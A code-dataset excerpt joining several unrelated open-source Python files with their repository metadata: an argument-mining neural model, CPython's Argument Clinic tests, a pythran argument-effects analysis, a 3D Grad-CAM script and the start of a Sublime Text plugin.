obj_prop = [dy.dot_product(prop, dy.inputVector(diff))
for prop, diff, hamm
in zip(dy_prop_potentials, diffs, prop_hamm)
if hamm > 1e-9]
# link loss
link_ix = np.arange(len(y_link))
link_cws = self.link_cw_[y_link]
link_hamm = link_cws * (1 - link_marg[link_ix, y_link])
diffs = link_marg - Y_link
obj_link = [dy.dot_product(link, dy.inputVector(diff))
for link, diff, hamm
in zip(dy_link_potentials, diffs, link_hamm)
if hamm > 1e-9]
hamming_loss = prop_hamm.sum() + link_hamm.sum()
max_hamming_loss = prop_cws.sum() + link_cws.sum()
obj = obj_prop + obj_link
# append compat objective
compat_diff = (compat_marg - compat_true).ravel()
compat_obj = dy.dot_product(dy_compat_potentials,
dy.inputVector(compat_diff))
obj.append(compat_obj)
# append second order objective
second_order_potentials = (dy_coparent_potentials +
dy_grandparent_potentials +
dy_sibling_potentials)
if second_order_potentials:
second_order_potentials = dy.concatenate(second_order_potentials)
second_order_diff = second_order_marg - second_order_true
second_order_obj = dy.dot_product(
second_order_potentials, dy.inputVector(second_order_diff))
second_order_obj = second_order_obj
obj.append(second_order_obj)
obj = dy.esum(obj)
return obj, hamming_loss, max_hamming_loss, status
def initialize(self, docs, Y):
if self.compat_features:
self.n_compat_features = docs[0].compat_features.shape[1]
self.coparents_ = self.coparent_layers > 0
self.grandparents_ = self.grandparent_layers > 0
self.siblings_ = self.sibling_layers > 0
self.build_vocab(docs)
self.initialize_labels(Y)
self.init_params()
def fit(self, docs, Y, docs_val=None, Y_val=None):
self.initialize(docs, Y)
self.scores_ = []
if self.score_at_iter:
score_at_iter = self.score_at_iter
else:
score_at_iter = []
train_time = 0
for it in range(self.max_iter):
# evaluate
if docs_val and it in score_at_iter:
Y_val_pred = self.predict(docs_val, exact=False)
val_scores = self._score(Y_val, Y_val_pred)
self.scores_.append(val_scores)
with warnings.catch_warnings():
warnings.simplefilter('ignore')
print("\t\t val link: {:.3f}/{:.3f} Node: {:.3f}/{:.3f} "
"accuracy {:.3f}".format(*val_scores))
docs, Y = shuffle(docs, Y, random_state=0)
iter_loss = 0
iter_max_loss = 0
inference_status = Counter()
tic = time()
for doc, y in zip(docs, Y):
if len(y.nodes) == 0:
continue
obj, loss, max_loss, status = self._doc_loss(doc, y)
inference_status[status] += 1
iter_loss += loss
iter_max_loss += max_loss
if loss < 1e-9:
continue
obj.scalar_value()
obj.backward()
self._trainer.update()
self._trainer.update_epoch()
self._trainer.status()
toc = time()
train_time += toc - tic
print("Iter {} loss {:.4f}".format(it, iter_loss / iter_max_loss))
print(", ".join("{:.1f}% {}".format(100 * val / len(docs), key)
for key, val in inference_status.most_common()))
if iter_loss < 1e-9:
break
if docs_val and self.max_iter in score_at_iter:
Y_val_pred = self.predict(docs_val, exact=False)
val_scores = self._score(Y_val, Y_val_pred)
self.scores_.append(val_scores)
logging.info("Training time: {:.2f}s/iteration ({:.2f}s/doc-iter)"
.format(train_time / it, train_time / (it * len(docs))))
def predict(self, docs, exact=None):
if exact is None:
exact = self.exact_test
pred = []
statuses = Counter()
tic = time()
for doc in docs:
dy_potentials = self.build_cg(doc, training=False)
potentials = self._get_potentials(doc, dy_potentials)
y_pred, status = self._inference(doc, potentials, relaxed=False,
exact=exact,
constraints=self.constraints)
pred.append(y_pred)
statuses[status] += 1
toc = time()
logging.info("Prediction time: {:.2f}s/doc".format((toc - tic) /
len(docs)))
logging.info("Test inference status: " +
", ".join(
"{:.1f}% {}".format(100 * val / len(docs), key)
for key, val in statuses.most_common()))
return pred
class BaselineArgumentLSTM(ArgumentLSTM):
"""Baseline multi-task model with only proposition and link potentials.
Evaluation is done both directly (argmax) or after decoding with
constraints, depending on whether constraints == None.
For code simplicity, AD3 is still called, but decoding should be
instantaneous without extra constraints.)
"""
def __init__(self, max_iter=100, score_at_iter=None, n_embed=128,
lstm_layers=2, prop_mlp_layers=2, link_mlp_layers=1,
link_bilinear=True, n_lstm=128, n_mlp=128,
lstm_dropout=0.0, mlp_dropout=0.1, embeds=None,
exact_inference=False, constraints=None,
exact_test=False):
super(BaselineArgumentLSTM, self).__init__(
max_iter=max_iter, score_at_iter=score_at_iter,
n_embed=n_embed, lstm_layers=lstm_layers,
prop_mlp_layers=prop_mlp_layers,
link_mlp_layers=link_mlp_layers, link_bilinear=link_bilinear,
n_lstm=n_lstm, n_mlp=n_mlp, lstm_dropout=lstm_dropout,
mlp_dropout=mlp_dropout, embeds=embeds, class_weight=None,
exact_inference=exact_inference, compat_features=False,
constraints=constraints, second_order_multilinear=False,
coparent_layers=0, grandparent_layers=0, sibling_layers=0,
exact_test=exact_test)
def _doc_loss(self, doc, y):
y_node = self.prop_encoder_.transform(y.nodes)
y_link = self.link_encoder_.transform(y.links)
props, links, _, _, _, _ = self.build_cg(doc)
obj_prop = [dy.hinge(prop, y_) for prop, y_ in zip(props, y_node)]
obj_link = [dy.hinge(link, y_) for link, y_ in zip(links, y_link)]
obj = dy.esum(obj_prop) + dy.esum(obj_link)
correct = sum(1 for val in obj_prop + obj_link
if val.scalar_value() == 0)
max_acc = len(obj_prop + obj_link)
return obj, max_acc - correct, max_acc, 'n/a'
| {
"repo_name": "vene/marseille",
"path": "marseille/argrnn.py",
"copies": "1",
"size": "26407",
"license": "bsd-3-clause",
"hash": -7546774200757549000,
"line_mean": 36.3507779349,
"line_max": 79,
"alpha_frac": 0.5577687734,
"autogenerated": false,
"ratio": 3.7832378223495704,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.48410065957495707,
"avg_score": null,
"num_lines": null
} |
import clinic
from clinic import DSLParser
import collections
import inspect
from test import support
import sys
import unittest
from unittest import TestCase
class FakeConverter:
def __init__(self, name, args):
self.name = name
self.args = args
class FakeConverterFactory:
def __init__(self, name):
self.name = name
def __call__(self, name, default, **kwargs):
return FakeConverter(self.name, kwargs)
class FakeConvertersDict:
def __init__(self):
self.used_converters = {}
def get(self, name, default):
return self.used_converters.setdefault(name, FakeConverterFactory(name))
clinic.Clinic.presets_text = ''
c = clinic.Clinic(language='C')
class FakeClinic:
def __init__(self):
self.converters = FakeConvertersDict()
self.legacy_converters = FakeConvertersDict()
self.language = clinic.CLanguage(None)
self.filename = None
self.block_parser = clinic.BlockParser('', self.language)
self.modules = collections.OrderedDict()
self.classes = collections.OrderedDict()
clinic.clinic = self
self.name = "FakeClinic"
self.line_prefix = self.line_suffix = ''
self.destinations = {}
self.add_destination("block", "buffer")
self.add_destination("file", "buffer")
self.add_destination("suppress", "suppress")
d = self.destinations.get
self.field_destinations = collections.OrderedDict((
('docstring_prototype', d('suppress')),
('docstring_definition', d('block')),
('methoddef_define', d('block')),
('impl_prototype', d('block')),
('parser_prototype', d('suppress')),
('parser_definition', d('block')),
('impl_definition', d('block')),
))
def get_destination(self, name):
d = self.destinations.get(name)
if not d:
sys.exit("Destination does not exist: " + repr(name))
return d
def add_destination(self, name, type, *args):
if name in self.destinations:
sys.exit("Destination already exists: " + repr(name))
self.destinations[name] = clinic.Destination(name, type, self, *args)
def is_directive(self, name):
return name == "module"
def directive(self, name, args):
self.called_directives[name] = args
_module_and_class = clinic.Clinic._module_and_class
class ClinicWholeFileTest(TestCase):
def test_eol(self):
# regression test:
# clinic's block parser didn't recognize
# the "end line" for the block if it
# didn't end in "\n" (as in, the last)
# byte of the file was '/'.
# so it would spit out an end line for you.
# and since you really already had one,
# the last line of the block got corrupted.
c = clinic.Clinic(clinic.CLanguage(None))
raw = "/*[clinic]\nfoo\n[clinic]*/"
cooked = c.parse(raw).splitlines()
end_line = cooked[2].rstrip()
# this test is redundant, it's just here explicitly to catch
# the regression test so we don't forget what it looked like
self.assertNotEqual(end_line, "[clinic]*/[clinic]*/")
self.assertEqual(end_line, "[clinic]*/")
class ClinicGroupPermuterTest(TestCase):
def _test(self, l, m, r, output):
computed = clinic.permute_optional_groups(l, m, r)
self.assertEqual(output, computed)
def test_range(self):
self._test([['start']], ['stop'], [['step']],
(
('stop',),
('start', 'stop',),
('start', 'stop', 'step',),
))
def test_add_window(self):
self._test([['x', 'y']], ['ch'], [['attr']],
(
('ch',),
('ch', 'attr'),
('x', 'y', 'ch',),
('x', 'y', 'ch', 'attr'),
))
def test_ludicrous(self):
self._test([['a1', 'a2', 'a3'], ['b1', 'b2']], ['c1'], [['d1', 'd2'], ['e1', 'e2', 'e3']],
(
('c1',),
('b1', 'b2', 'c1'),
('b1', 'b2', 'c1', 'd1', 'd2'),
('a1', 'a2', 'a3', 'b1', 'b2', 'c1'),
('a1', 'a2', 'a3', 'b1', 'b2', 'c1', 'd1', 'd2'),
('a1', 'a2', 'a3', 'b1', 'b2', 'c1', 'd1', 'd2', 'e1', 'e2', 'e3'),
))
def test_right_only(self):
self._test([], [], [['a'],['b'],['c']],
(
(),
('a',),
('a', 'b'),
('a', 'b', 'c')
))
def test_have_left_options_but_required_is_empty(self):
def fn():
clinic.permute_optional_groups(['a'], [], [])
self.assertRaises(AssertionError, fn)
class ClinicLinearFormatTest(TestCase):
def _test(self, input, output, **kwargs):
computed = clinic.linear_format(input, **kwargs)
self.assertEqual(output, computed)
def test_empty_strings(self):
self._test('', '')
def test_solo_newline(self):
self._test('\n', '\n')
def test_no_substitution(self):
self._test("""
abc
""", """
abc
""")
def test_empty_substitution(self):
self._test("""
abc
{name}
def
""", """
abc
def
""", name='')
def test_single_line_substitution(self):
self._test("""
abc
{name}
def
""", """
abc
GARGLE
def
""", name='GARGLE')
def test_multiline_substitution(self):
self._test("""
abc
{name}
def
""", """
abc
bingle
bungle
def
""", name='bingle\nbungle\n')
class InertParser:
def __init__(self, clinic):
pass
def parse(self, block):
pass
class CopyParser:
def __init__(self, clinic):
pass
def parse(self, block):
block.output = block.input
class ClinicBlockParserTest(TestCase):
def _test(self, input, output):
language = clinic.CLanguage(None)
blocks = list(clinic.BlockParser(input, language))
writer = clinic.BlockPrinter(language)
for block in blocks:
writer.print_block(block)
output = writer.f.getvalue()
assert output == input, "output != input!\n\noutput " + repr(output) + "\n\n input " + repr(input)
def round_trip(self, input):
return self._test(input, input)
def test_round_trip_1(self):
self.round_trip("""
verbatim text here
lah dee dah
""")
def test_round_trip_2(self):
self.round_trip("""
verbatim text here
lah dee dah
/*[inert]
abc
[inert]*/
def
/*[inert checksum: 7b18d017f89f61cf17d47f92749ea6930a3f1deb]*/
xyz
""")
def _test_clinic(self, input, output):
language = clinic.CLanguage(None)
c = clinic.Clinic(language)
c.parsers['inert'] = InertParser(c)
c.parsers['copy'] = CopyParser(c)
computed = c.parse(input)
self.assertEqual(output, computed)
def test_clinic_1(self):
self._test_clinic("""
verbatim text here
lah dee dah
/*[copy input]
def
[copy start generated code]*/
abc
/*[copy end generated code: output=03cfd743661f0797 input=7b18d017f89f61cf]*/
xyz
""", """
verbatim text here
lah dee dah
/*[copy input]
def
[copy start generated code]*/
def
/*[copy end generated code: output=7b18d017f89f61cf input=7b18d017f89f61cf]*/
xyz
""")
class ClinicParserTest(TestCase):
def test_trivial(self):
parser = DSLParser(FakeClinic())
block = clinic.Block("module os\nos.access")
parser.parse(block)
module, function = block.signatures
self.assertEqual("access", function.name)
self.assertEqual("os", module.name)
def test_ignore_line(self):
block = self.parse("#\nmodule os\nos.access")
module, function = block.signatures
self.assertEqual("access", function.name)
self.assertEqual("os", module.name)
def test_param(self):
function = self.parse_function("module os\nos.access\n path: int")
self.assertEqual("access", function.name)
self.assertEqual(2, len(function.parameters))
p = function.parameters['path']
self.assertEqual('path', p.name)
self.assertIsInstance(p.converter, clinic.int_converter)
def test_param_default(self):
function = self.parse_function("module os\nos.access\n follow_symlinks: bool = True")
p = function.parameters['follow_symlinks']
self.assertEqual(True, p.default)
def test_param_with_continuations(self):
function = self.parse_function("module os\nos.access\n follow_symlinks: \\\n bool \\\n =\\\n True")
p = function.parameters['follow_symlinks']
self.assertEqual(True, p.default)
def test_param_default_expression(self):
function = self.parse_function("module os\nos.access\n follow_symlinks: int(c_default='MAXSIZE') = sys.maxsize")
p = function.parameters['follow_symlinks']
self.assertEqual(sys.maxsize, p.default)
self.assertEqual("MAXSIZE", p.converter.c_default)
s = self.parse_function_should_fail("module os\nos.access\n follow_symlinks: int = sys.maxsize")
self.assertEqual(s, "Error on line 0:\nWhen you specify a named constant ('sys.maxsize') as your default value,\nyou MUST specify a valid c_default.\n")
def test_param_no_docstring(self):
function = self.parse_function("""
module os
os.access
follow_symlinks: bool = True
something_else: str = ''""")
p = function.parameters['follow_symlinks']
self.assertEqual(3, len(function.parameters))
self.assertIsInstance(function.parameters['something_else'].converter, clinic.str_converter)
def test_param_default_parameters_out_of_order(self):
s = self.parse_function_should_fail("""
module os
os.access
follow_symlinks: bool = True
something_else: str""")
self.assertEqual(s, """Error on line 0:
Can't have a parameter without a default ('something_else')
after a parameter with a default!
""")
def disabled_test_converter_arguments(self):
function = self.parse_function("module os\nos.access\n path: path_t(allow_fd=1)")
p = function.parameters['path']
self.assertEqual(1, p.converter.args['allow_fd'])
def test_function_docstring(self):
function = self.parse_function("""
module os
os.stat as os_stat_fn
path: str
Path to be examined
Perform a stat system call on the given path.""")
self.assertEqual("""
stat($module, /, path)
--
Perform a stat system call on the given path.
path
Path to be examined
""".strip(), function.docstring)
def test_explicit_parameters_in_docstring(self):
function = self.parse_function("""
module foo
foo.bar
x: int
Documentation for x.
y: int
This is the documentation for foo.
Okay, we're done here.
""")
self.assertEqual("""
bar($module, /, x, y)
--
This is the documentation for foo.
x
Documentation for x.
Okay, we're done here.
""".strip(), function.docstring)
def test_parser_regression_special_character_in_parameter_column_of_docstring_first_line(self):
function = self.parse_function("""
module os
os.stat
path: str
This/used to break Clinic!
""")
self.assertEqual("stat($module, /, path)\n--\n\nThis/used to break Clinic!", function.docstring)
def test_c_name(self):
function = self.parse_function("module os\nos.stat as os_stat_fn")
self.assertEqual("os_stat_fn", function.c_basename)
def test_return_converter(self):
function = self.parse_function("module os\nos.stat -> int")
self.assertIsInstance(function.return_converter, clinic.int_return_converter)
def test_star(self):
function = self.parse_function("module os\nos.access\n *\n follow_symlinks: bool = True")
p = function.parameters['follow_symlinks']
self.assertEqual(inspect.Parameter.KEYWORD_ONLY, p.kind)
self.assertEqual(0, p.group)
def test_group(self):
function = self.parse_function("module window\nwindow.border\n [\n ls : int\n ]\n /\n")
p = function.parameters['ls']
self.assertEqual(1, p.group)
def test_left_group(self):
function = self.parse_function("""
module curses
curses.addch
[
y: int
Y-coordinate.
x: int
X-coordinate.
]
ch: char
Character to add.
[
attr: long
Attributes for the character.
]
/
""")
for name, group in (
('y', -1), ('x', -1),
('ch', 0),
('attr', 1),
):
p = function.parameters[name]
self.assertEqual(p.group, group)
self.assertEqual(p.kind, inspect.Parameter.POSITIONAL_ONLY)
self.assertEqual(function.docstring.strip(), """
addch([y, x,] ch, [attr])
y
Y-coordinate.
x
X-coordinate.
ch
Character to add.
attr
Attributes for the character.
""".strip())
def test_nested_groups(self):
function = self.parse_function("""
module curses
curses.imaginary
[
[
y1: int
Y-coordinate.
y2: int
Y-coordinate.
]
x1: int
X-coordinate.
x2: int
X-coordinate.
]
ch: char
Character to add.
[
attr1: long
Attributes for the character.
attr2: long
Attributes for the character.
attr3: long
Attributes for the character.
[
attr4: long
Attributes for the character.
attr5: long
Attributes for the character.
attr6: long
Attributes for the character.
]
]
/
""")
for name, group in (
('y1', -2), ('y2', -2),
('x1', -1), ('x2', -1),
('ch', 0),
('attr1', 1), ('attr2', 1), ('attr3', 1),
('attr4', 2), ('attr5', 2), ('attr6', 2),
):
p = function.parameters[name]
self.assertEqual(p.group, group)
self.assertEqual(p.kind, inspect.Parameter.POSITIONAL_ONLY)
self.assertEqual(function.docstring.strip(), """
imaginary([[y1, y2,] x1, x2,] ch, [attr1, attr2, attr3, [attr4, attr5,
attr6]])
y1
Y-coordinate.
y2
Y-coordinate.
x1
X-coordinate.
x2
X-coordinate.
ch
Character to add.
attr1
Attributes for the character.
attr2
Attributes for the character.
attr3
Attributes for the character.
attr4
Attributes for the character.
attr5
Attributes for the character.
attr6
Attributes for the character.
""".strip())
def parse_function_should_fail(self, s):
with support.captured_stdout() as stdout:
with self.assertRaises(SystemExit):
self.parse_function(s)
return stdout.getvalue()
def test_disallowed_grouping__two_top_groups_on_left(self):
s = self.parse_function_should_fail("""
module foo
foo.two_top_groups_on_left
[
group1 : int
]
[
group2 : int
]
param: int
""")
self.assertEqual(s,
('Error on line 0:\n'
'Function two_top_groups_on_left has an unsupported group configuration. (Unexpected state 2.b)\n'))
def test_disallowed_grouping__two_top_groups_on_right(self):
self.parse_function_should_fail("""
module foo
foo.two_top_groups_on_right
param: int
[
group1 : int
]
[
group2 : int
]
""")
def test_disallowed_grouping__parameter_after_group_on_right(self):
self.parse_function_should_fail("""
module foo
foo.parameter_after_group_on_right
param: int
[
[
group1 : int
]
group2 : int
]
""")
def test_disallowed_grouping__group_after_parameter_on_left(self):
self.parse_function_should_fail("""
module foo
foo.group_after_parameter_on_left
[
group2 : int
[
group1 : int
]
]
param: int
""")
def test_disallowed_grouping__empty_group_on_left(self):
self.parse_function_should_fail("""
module foo
foo.empty_group
[
[
]
group2 : int
]
param: int
""")
def test_disallowed_grouping__empty_group_on_right(self):
self.parse_function_should_fail("""
module foo
foo.empty_group
param: int
[
[
]
group2 : int
]
""")
def test_no_parameters(self):
function = self.parse_function("""
module foo
foo.bar
Docstring
""")
self.assertEqual("bar($module, /)\n--\n\nDocstring", function.docstring)
self.assertEqual(1, len(function.parameters)) # self!
def test_init_with_no_parameters(self):
function = self.parse_function("""
module foo
class foo.Bar "unused" "notneeded"
foo.Bar.__init__
Docstring
""", signatures_in_block=3, function_index=2)
# self is not in the signature
self.assertEqual("Bar()\n--\n\nDocstring", function.docstring)
# but it *is* a parameter
self.assertEqual(1, len(function.parameters))
def test_illegal_module_line(self):
self.parse_function_should_fail("""
module foo
foo.bar => int
/
""")
def test_illegal_c_basename(self):
self.parse_function_should_fail("""
module foo
foo.bar as 935
/
""")
def test_single_star(self):
self.parse_function_should_fail("""
module foo
foo.bar
*
*
""")
def test_parameters_required_after_star_without_initial_parameters_or_docstring(self):
self.parse_function_should_fail("""
module foo
foo.bar
*
""")
def test_parameters_required_after_star_without_initial_parameters_with_docstring(self):
self.parse_function_should_fail("""
module foo
foo.bar
*
Docstring here.
""")
def test_parameters_required_after_star_with_initial_parameters_without_docstring(self):
self.parse_function_should_fail("""
module foo
foo.bar
this: int
*
""")
def test_parameters_required_after_star_with_initial_parameters_and_docstring(self):
self.parse_function_should_fail("""
module foo
foo.bar
this: int
*
Docstring.
""")
def test_single_slash(self):
self.parse_function_should_fail("""
module foo
foo.bar
/
/
""")
def test_mix_star_and_slash(self):
self.parse_function_should_fail("""
module foo
foo.bar
x: int
y: int
*
z: int
/
""")
def test_parameters_not_permitted_after_slash_for_now(self):
self.parse_function_should_fail("""
module foo
foo.bar
/
x: int
""")
def test_function_not_at_column_0(self):
function = self.parse_function("""
module foo
foo.bar
x: int
Nested docstring here, goeth.
*
y: str
Not at column 0!
""")
self.assertEqual("""
bar($module, /, x, *, y)
--
Not at column 0!
x
Nested docstring here, goeth.
""".strip(), function.docstring)
def test_directive(self):
c = FakeClinic()
parser = DSLParser(c)
parser.flag = False
parser.directives['setflag'] = lambda : setattr(parser, 'flag', True)
block = clinic.Block("setflag")
parser.parse(block)
self.assertTrue(parser.flag)
def test_legacy_converters(self):
block = self.parse('module os\nos.access\n path: "s"')
module, function = block.signatures
self.assertIsInstance((function.parameters['path']).converter, clinic.str_converter)
def parse(self, text):
c = FakeClinic()
parser = DSLParser(c)
block = clinic.Block(text)
parser.parse(block)
return block
def parse_function(self, text, signatures_in_block=2, function_index=1):
block = self.parse(text)
s = block.signatures
self.assertEqual(len(s), signatures_in_block)
assert isinstance(s[0], clinic.Module)
assert isinstance(s[function_index], clinic.Function)
return s[function_index]
def test_scaffolding(self):
# test repr on special values
self.assertEqual(repr(clinic.unspecified), '<Unspecified>')
self.assertEqual(repr(clinic.NULL), '<Null>')
# test that fail fails
with support.captured_stdout() as stdout:
with self.assertRaises(SystemExit):
clinic.fail('The igloos are melting!', filename='clown.txt', line_number=69)
self.assertEqual(stdout.getvalue(), 'Error in file "clown.txt" on line 69:\nThe igloos are melting!\n')
if __name__ == "__main__":
unittest.main()
| {
"repo_name": "batermj/algorithm-challenger",
"path": "code-analysis/programming_anguage/python/source_codes/Python3.5.9/Python-3.5.9/Tools/clinic/clinic_test.py",
"copies": "3",
"size": "20753",
"license": "apache-2.0",
"hash": 6013575597823115000,
"line_mean": 25.2364096081,
"line_max": 160,
"alpha_frac": 0.5894087602,
"autogenerated": false,
"ratio": 3.602325985072036,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.001415779074329627,
"num_lines": 791
} |
""" ArgumentEffects computes write effect on arguments. """
from pythran.analyses.aliases import Aliases
from pythran.analyses.global_declarations import GlobalDeclarations
from pythran.passmanager import ModuleAnalysis
from pythran.tables import MODULES
# FIXME: investigate why we need to import it that way
from pythran import intrinsic
import gast as ast
import networkx as nx
from functools import reduce
class FunctionEffects(object):
def __init__(self, node):
self.func = node
if isinstance(node, ast.FunctionDef):
self.update_effects = [False] * len(node.args.args)
elif isinstance(node, intrinsic.Intrinsic):
self.update_effects = [isinstance(x, intrinsic.UpdateEffect)
for x in node.argument_effects]
elif isinstance(node, ast.alias):
self.update_effects = []
elif isinstance(node, intrinsic.Class):
self.update_effects = []
else:
raise NotImplementedError
# Compute the intrinsic effects only once
IntrinsicArgumentEffects = {}
def save_function_effect(module):
""" Recursively save function effect for pythonic functions. """
for intr in module.values():
if isinstance(intr, dict): # Submodule case
save_function_effect(intr)
else:
fe = FunctionEffects(intr)
IntrinsicArgumentEffects[intr] = fe
if isinstance(intr, intrinsic.Class):
save_function_effect(intr.fields)
for module in MODULES.values():
save_function_effect(module)
class ArgumentEffects(ModuleAnalysis):
"""Gathers inter-procedural effects on function arguments."""
def __init__(self):
self.result = nx.DiGraph()
self.node_to_functioneffect = IntrinsicArgumentEffects.copy()
for fe in IntrinsicArgumentEffects.values():
self.result.add_node(fe)
super(ArgumentEffects, self).__init__(Aliases, GlobalDeclarations)
def prepare(self, node):
"""
Initialise arguments effects as this analyse is inter-procedural.
Initialisation done for Pythonic functions and default value set for
user defined functions.
"""
super(ArgumentEffects, self).prepare(node)
for n in self.global_declarations.values():
fe = FunctionEffects(n)
self.node_to_functioneffect[n] = fe
self.result.add_node(fe)
def run(self, node):
result = super(ArgumentEffects, self).run(node)
candidates = set(result)
while candidates:
function = candidates.pop()
for ue in enumerate(function.update_effects):
update_effect_idx, update_effect = ue
if not update_effect:
continue
for pred in result.predecessors(function):
edge = result.edges[pred, function]
for fp in enumerate(edge["formal_parameters"]):
i, formal_parameter_idx = fp
# propagate the impurity backward if needed.
# Afterward we may need another graph iteration
ith_effectiv = edge["effective_parameters"][i]
if(formal_parameter_idx == update_effect_idx and
not pred.update_effects[ith_effectiv]):
pred.update_effects[ith_effectiv] = True
candidates.add(pred)
self.result = {f.func: f.update_effects for f in result}
return self.result
def argument_index(self, node):
while isinstance(node, ast.Subscript):
node = node.value
for node_alias in self.aliases[node]:
while isinstance(node_alias, ast.Subscript):
node_alias = node_alias.value
if node_alias in self.current_arguments:
return self.current_arguments[node_alias]
if node_alias in self.current_subscripted_arguments:
return self.current_subscripted_arguments[node_alias]
return -1
def visit_FunctionDef(self, node):
self.current_function = self.node_to_functioneffect[node]
self.current_arguments = {arg: i
for i, arg
in enumerate(node.args.args)}
self.current_subscripted_arguments = dict()
assert self.current_function in self.result
self.generic_visit(node)
def visit_For(self, node):
ai = self.argument_index(node.iter)
if ai >= 0:
self.current_subscripted_arguments[node.target] = ai
self.generic_visit(node)
def visit_AugAssign(self, node):
n = self.argument_index(node.target)
if n >= 0:
self.current_function.update_effects[n] = True
self.generic_visit(node)
def visit_Assign(self, node):
for t in node.targets:
if isinstance(t, ast.Subscript):
n = self.argument_index(t)
if n >= 0:
self.current_function.update_effects[n] = True
self.generic_visit(node)
def visit_Call(self, node):
for i, arg in enumerate(node.args):
n = self.argument_index(arg)
if n >= 0:
func_aliases = self.aliases[node.func]
# pessimistic case: no alias found
if func_aliases is None:
self.current_function.update_effects[n] = True
continue
# expand argument if any
func_aliases = reduce(
lambda x, y: x + (
# all functions
list(self.node_to_functioneffect.keys())
if (isinstance(y, ast.Name) and
self.argument_index(y) >= 0)
else [y]),
func_aliases,
list())
for func_alias in func_aliases:
# special hook for binded functions
if isinstance(func_alias, ast.Call):
bound_name = func_alias.args[0].id
func_alias = self.global_declarations[bound_name]
if func_alias is intrinsic.UnboundValue:
continue
if func_alias not in self.node_to_functioneffect:
continue
if func_alias is MODULES['functools']['partial']:
base_func_aliases = self.aliases[node.args[0]]
fe = self.node_to_functioneffect[func_alias]
if len(base_func_aliases) == 1:
base_func_alias = next(iter(base_func_aliases))
fe = self.node_to_functioneffect.get(
base_func_alias,
fe)
else:
fe = self.node_to_functioneffect[func_alias]
predecessors = self.result.predecessors(fe)
if self.current_function not in predecessors:
self.result.add_edge(
self.current_function,
fe,
effective_parameters=[],
formal_parameters=[])
edge = self.result.edges[self.current_function, fe]
edge["effective_parameters"].append(n)
edge["formal_parameters"].append(i)
self.generic_visit(node)
| {
"repo_name": "serge-sans-paille/pythran",
"path": "pythran/analyses/argument_effects.py",
"copies": "1",
"size": "7686",
"license": "bsd-3-clause",
"hash": 3244019370482658300,
"line_mean": 39.03125,
"line_max": 76,
"alpha_frac": 0.549960968,
"autogenerated": false,
"ratio": 4.497366881217086,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5547327849217086,
"avg_score": null,
"num_lines": null
} |
os.environ["KERAS_BACKEND"] = "tensorflow"
os.environ["CUDA_VISIBLE_DEVICES"] = GPU
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3"
import tensorflow as tf
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
from keras import backend as K
K.set_session(sess)
import keras
from keras.models import Sequential, model_from_json
from keras.layers.core import Dense, Dropout, Flatten
from keras.layers.convolutional import Convolution3D, MaxPooling3D, ZeroPadding3D
from keras.layers.normalization import BatchNormalization
import sys
import numpy as np
import scipy.io as sio
from GradCAM import prepareGradCAM, GradCAM, registerGradient, modifyBackprop, compileSaliencyFunction
from loadModel import loadModel
p=['inouts','xNormals','yNormals','zNormals']
def loadFile(array,filename, xVoxelCount, yVoxelCount, zVoxelCount, channel):
u = os.path.join(p[c],filename)
tempArray = np.fromfile(filename, dtype=np.dtype('uint8'))
tempArray= np. reshape(tempArray,(xVoxelCount, yVoxelCount, zVoxelCount),order='C')
tempArray = tempArray.astype('float') / 255.0
array[0, :, :, :, c] = tempArray
del tempArray
if __name__ == '__main__':
cnnModel = loadModel(model_no,channels,activation,voxelCount,nbClasses)
cnnModel.load_weights('weights\model%s_%schannel_%sactivation_%svoxel_count_%sclasses.h5'%(model_no,channels,activation,voxelCount,nbClasses))
# Popping the softmax layer as it creates ambiguity in the explanation
cnnModel.pop()
# The layer index of the last fully convolutional layer after removing the softmax layer
layerIdx = -4
# Keras functions for getting the GradCAM and guided GradCAM
activationFunction=prepareGradCAM(cnnModel, layerIdx, nbClasses)
saliency_fn = compileSaliencyFunction(cnnModel, model_no, channels, activation, voxelCount, nbClasses, activation_layer=-4)
if example_no=="all":
list_raw = glob.glob("Examples\inouts\*.raw")
for fileidx, filename in enumerate (list_raw):
array=np.zeros((1,voxelCount,voxelCount,voxelCount,channels))
for c in range(channels):
loadFile(array,filename,voxelCount, voxelCount, voxelCount, c)
predicted_class = cnnModel.predict(array)
print(filename,'has a predicted class',predicted_class)
attMap = GradCAM(activationFunction, array)
gBackprop = saliency_fn([array, 0])
gGradCam = gBackprop[0] * attMap[..., np.newaxis]
gGradCam = (gGradCam / np.max(gGradCam))
finalOutput = (1 * np.float32(gGradCam)) + 1*np.float32(array)
finalOutput = (finalOutput / np.max(finalOutput))
finalOutput*=255.0
finalOutput.astype('uint8').tofile("GradCAM_outputs\\"+filename)
else:
filename="Examples/inouts/"+example_no+".raw"
array=np.zeros((1,voxelCount,voxelCount,voxelCount,channels))
for c in range(channels):
loadFile(array,filename,voxelCount, voxelCount, voxelCount, c)
predicted_class = cnnModel.predict(array)
print(filename,'has a predicted class',predicted_class)
attMap = GradCAM(activationFunction, array)
gBackprop = saliency_fn([array, 0])
gGradCam = gBackprop[0] * attMap[..., np.newaxis]
# attMap*=255.0
gGradCam = (gGradCam / np.max(gGradCam))
finalOutput = (1 * np.float32(gGradCam)) + (1 * np.float32(array))
finalOutput = (finalOutput / np.max(finalOutput))
finalOutput*=255.0
finalOutput.astype('uint8').tofile("GradCAM_outputs\\"+filename)
print('attention map saved' )
| {
"repo_name": "AdamLabISU/3DGradCAM",
"path": "test.py",
"copies": "1",
"size": "4625",
"license": "bsd-3-clause",
"hash": -8603497841296469000,
"line_mean": 43.4711538462,
"line_max": 163,
"alpha_frac": 0.6951351351,
"autogenerated": false,
"ratio": 3.4132841328413286,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4608419267941329,
"avg_score": null,
"num_lines": null
} |
# Argument Noun
#
# Sublime Text plugin that extends Vintage mode with support
# for treating function arguments (including parameters) as
# an 'a' text noun.
#
# Usage:
# delete an argument by pressing "daa"
# change inner argument by pressing "cia"
# select inner argument by pressing "via"
#
# Copyright (c) 2013 Nils Liberg
# License: MIT License
import sublime, sublime_plugin
import re
def transform_selection_regions(view, f, **kwargs):
sel = view.sel()
new_sel = [f(r, **kwargs) for r in sel]
sel.clear()
for r in new_sel:
sel.add(r)
def remove_inner_parenthesis(s):
